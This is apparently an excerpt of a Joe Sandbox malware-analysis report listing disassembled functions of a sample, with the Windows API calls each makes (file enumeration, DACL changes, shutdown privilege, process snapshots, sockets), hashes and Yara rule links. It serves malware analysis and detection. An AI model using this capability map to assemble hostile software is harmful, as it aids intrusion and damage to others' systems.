                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                              • API String ID: 4115725249-188983378
                                                                              • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                              • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                              • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                              • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                              Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1409584000-438819550
                                                                              • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                              • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                              Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Timetime$Sleep
                                                                              • String ID: BUTTON
                                                                              • API String ID: 4176159691-3405671355
                                                                              • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                              • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                              Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                              • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 2640511053-438819550
                                                                              • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                              • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                              Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                              • _memset.LIBCMT ref: 00445E61
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                              • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                              • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                              • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                              • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3490752873-0
                                                                              • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                              • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                              Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                              • _memset.LIBCMT ref: 0047AB7C
                                                                              • _wcslen.LIBCMT ref: 0047AC68
                                                                              • _memset.LIBCMT ref: 0047ACCD
                                                                              • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                              • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0047AD84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1588287285-2785691316
                                                                              • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                              • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                              Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                              • GetLastError.KERNEL32 ref: 00436504
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 2938487562-3733053543
                                                                              • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                              • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                              Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 00436162
                                                                              • __swprintf.LIBCMT ref: 00436176
                                                                                • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                              • __wcsicoll.LIBCMT ref: 00436185
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                              • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                              • LockResource.KERNEL32(?), ref: 004361FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 2406429042-0
                                                                              • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                              • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                              Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                              • GetLastError.KERNEL32 ref: 0045D59D
                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                              • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                              Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcslen.LIBCMT ref: 0047AE18
                                                                              • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                              • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                              • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                              • String ID: HH
                                                                              • API String ID: 1915432386-2761332787
                                                                              • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                              • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                              Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DEFINE$`$h$h
                                                                              • API String ID: 0-4194577831
                                                                              • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                              • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                              • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                              • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                              Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                              • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketsocket
                                                                              • String ID:
                                                                              • API String ID: 2609815416-0
                                                                              • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                              • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                              • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                              • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                              Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                              • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                              • __wsplitpath.LIBCMT ref: 004370A5
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004370BA
                                                                              • __wcsicoll.LIBCMT ref: 004370C8
                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                              • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                              Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                              • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                              • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
